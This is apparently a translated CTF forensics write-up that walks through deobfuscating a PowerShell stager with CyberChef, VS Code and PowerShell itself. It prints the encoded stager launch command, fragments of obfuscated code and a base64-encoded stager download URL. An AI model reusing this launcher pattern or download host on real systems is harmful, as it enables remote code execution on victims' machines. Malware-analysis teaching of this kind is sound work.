打开文件,我们看到
varc='powershell -noP -sta -w 1 -enc
指示 powershell stager,将 powershell 安装到你的系统上,为进一步分析做准备,让我们继续
IAAkAHsASABtAGAANABPAGAATgB1AH0AIAAgAD0AIABbAHQAeQBQAGUAX....大量的 base64,通过cyberchef运行,并用结果覆盖 base64
.$.{.H.m.`.4.O.`.N.u.}. . .= ....现在我们有很多点,你可以手动删除它们,但这太麻烦了,所以使用 vscode,我们可以自动删除文件中的所有点
${Hm`4O`Nu} = [tyPe]("{2}{0}{4}{7}{5}{1}{6}{3}{8}....现在你应该有像这样开始的东西,现在你可以通过在每一个后面添加一个换行符来清理一下代码;,这样代码之间就会有一些空格,使其更容易阅读
再次强调,你可以手动解码所有这些(如果你知道 powershell),但由于我们是新手,我们只需要让 powershell 运行代码并给出解码结果
pwsh -> ("{2}{0}{4}{7}{5}{1}{6}{3}{8}"-f 'EtSe','N','SYSTemn','AnAGe','rVIc','oI','TM','eP','r') ;打开 powershell 并运行这段代码,这将返回SYSTemnEtSerVIcePoINTMAnAGer,我们可以对其余代码执行类似操作,直到找到 stager url,即
aAB0AHQAcAA6AC8ALwB3AGkAawBpAC4AbgAwADAAYgB6AHUAbgBpAHQAMwBkAC4AeAB5AHoAOgA4ADAAOAAwAA==
-> wiki.n00bzunit3d.xyzforensics-deobf.md中的半完整反混淆文件
以这种方式解码混淆的 powershell 时要小心,因为你可能会意外地运行具有更复杂混淆的恶意代码
如果你想了解更多,我建议你观看约翰·哈蒙德的恶意软件分析视频,因为它们包含了这里使用的技术
